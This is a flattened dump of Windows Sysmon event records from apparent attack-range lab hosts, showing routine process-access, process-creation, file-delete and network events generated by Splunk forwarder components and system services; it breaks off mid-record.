12:31:29.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.695{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E6A1-63C7-A506-00000000AF02}7816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.695{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A1-63C7-A506-00000000AF02}7816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.696{FE4C2B44-E6A1-63C7-A506-00000000AF02}7816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.564{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E376F92F9E00A2871D57EE9B0016C304,SHA256=A88F6117802219F39A6E648BFD5CDFCA60F6FC003C973CDB549AC9D86B1145EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000019063Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:27.075{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50207-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000019062Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A1-63C7-4302-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019061Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019060Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019059Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019058Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019057Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019056Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019055Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019054Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019053Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019052Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E6A1-63C7-4302-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019051Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A1-63C7-4302-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019050Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.196{E5A8D418-E6A1-63C7-4302-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019095Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.979{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=497D22F08B4F1458BDA35D0CC201E5BD,SHA256=50CFD6F19C25908C5BBA5EB54EC7F3629CC441DD4E18C37181EF0F73903A30D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019094Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.807{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=4877FC548D0C9DF5465D3DBDB3D10235,SHA256=5E70C60ADB3FAC5267C6994E7B902E2CEEE5157F46089A5C833F5458186A4F83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A2-63C7-A706-00000000AF02}7884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E6A2-63C7-A706-00000000AF02}7884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A2-63C7-A706-00000000AF02}7884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program 